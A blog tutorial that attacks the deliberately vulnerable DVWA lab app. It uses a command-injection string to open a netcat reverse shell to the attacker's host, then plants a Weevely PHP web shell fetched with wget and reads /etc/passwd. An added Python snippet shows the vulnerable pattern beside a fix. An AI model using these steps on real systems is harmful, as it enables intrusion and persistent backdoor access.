Create a Persistent Back Door with Kali, Netcat and Weevely

This post will dive into how we can take advantage of a vulnerability in a web application to gain access and upload a backdoor that we can connect to in the future.

As always, this post is for educational purposes and should not be used on live networks. So we are using our internal network for this demonstration.


We will be creating a backdoor through the Command Execution module of DVWA, which is a web app on Metasploitable.


To start with, change the security setting from high to low on the DVWA Security tab.


Next we will need to move to the Command Execution module. The page just does a ping scan, so let's try it.


We will enter an IP address and click on submit.


Let's see if it will also run commands other than ping. We will try to run a Netcat command from the text box, so first, on the Kali machine command line, type:

nc -vv -l -p 8888

8888 is the port we want to listen on.


Next, in DVWA, type any IP address, then ; followed by nc -e /bin/sh 192.168.56.103 8888, and submit. The website connects back to the Kali machine.


The connection is established, and we have full control of the web app.
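
The input after the ; runs because the form's text reaches a shell as part of the ping command line. The following is an added example, not DVWA's code and not part of the original post, with hypothetical function names: it shows that unsafe pattern next to a handler that accepts only a bare IPv4 address and never invokes a shell.

```python
from __future__ import annotations
import ipaddress
import subprocess

PING_COUNT = "3"  # assumed packet count for this sketch

def vulnerable_command(target: str) -> str:
    """Unsafe pattern: form input concatenated into a shell command line."""
    return "ping -c " + PING_COUNT + " " + target  # a ';' in target begins a second command

def safe_ping_argv(target: str) -> list[str]:
    """Return argv for ping, or raise ValueError unless target is a bare IPv4 address."""
    addr = ipaddress.IPv4Address(target.strip())  # rejects trailing text and metacharacters
    return ["ping", "-c", PING_COUNT, str(addr)]

def run_ping(target: str) -> str:
    """Validate first, then execute without a shell so the input is only ever one argument."""
    argv = safe_ping_argv(target)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=15, check=False)
    return done.stdout

if __name__ == "__main__":
    # Constructed inputs: a plain address and the injected string from the walkthrough.
    samples = ["192.168.56.101", "192.168.56.101; nc -e /bin/sh 192.168.56.103 8888"]
    for s in samples:
        print("shell string :", vulnerable_command(s))
        try:
            print("safe argv    :", safe_ping_argv(s))
        except ValueError as exc:
            print("rejected     :", exc)
```
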


Now that we have full command-line control of the website, we can run any commands we wish. We now want to create a persistent back door and upload it to the website.

First we need to generate a backdoor with Weevely. Back on the Kali machine, in a new console window, type:

weevely generate 123456 /root/shell.txt

123456 will be our password which we will use later.


Copy it to the Apache web root:

cp /root/shell.txt /var/www/html

so we can see it in our browser.


Make sure it has been copied: shell.txt should now be in /var/www/html.


Next, start the Apache server on the Kali machine:

service apache2 start


In the Kali browser, go to 192.168.56.103/shell.txt or localhost/shell.txt to confirm the file is there.


We still have a Netcat connection on the server, so we can wget our shell.txt file:

wget http://192.168.56.103/shell.txt

and shell.txt should show as uploaded.


The file has been uploaded. Next we need to change its extension to .php for it to run.

mv shell.txt shell.php


Connect to the uploaded file from Kali:

weevely http://192.168.56.101/dvwa/vulnerabilities/shell.php 123456

 


We are connected to the backdoor in DVWA. Now that we have the backdoor in DVWA, we can run some helpful commands, for instance:

:help

This will give you a list of commands you can run on your back door. Interesting ones are:

:system_info


cat /etc/passwd


Another interesting command we can use is:

:audit_etcpasswd -vector <option>

To download a file from the target system:

:file_download rpath lpath

where rpath is the remote path and lpath is the local path.

So have a play around with Weevely when you pop your next server.

Thanks for reading and don’t forget to comment, like and of course, follow our blog for future tutorials.

QuBits 2018-09-13
